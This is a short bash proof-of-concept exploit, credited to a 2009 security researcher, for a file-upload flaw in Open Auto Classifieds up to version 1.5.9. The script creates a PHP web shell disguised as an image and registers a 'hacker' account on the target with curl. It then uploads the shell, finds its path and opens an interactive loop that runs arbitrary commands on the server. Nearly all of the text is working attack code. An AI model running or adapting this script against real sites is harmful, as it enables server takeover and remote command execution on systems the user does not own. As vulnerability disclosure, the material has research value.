#!/bin/bash
# File Upload exploit for Open Auto Classifieds version <= 1.5.9
# 
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009  http://www.morningstarsecurity.com/

if [ -z "$1" ]; then
  echo  "Usage: $0 <target-url>"
  echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
  echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
    echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
    exit
fi
target="$1"
  
echo "<? print passthru(\$_REQUEST['cmd']); ?>" > evilimage.jpg.php  

echo "Registering user"
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1

CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"`
rm -f cookiejar evilimage.jpg.php
echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id"

curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null
while read cmd; do
  curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null
done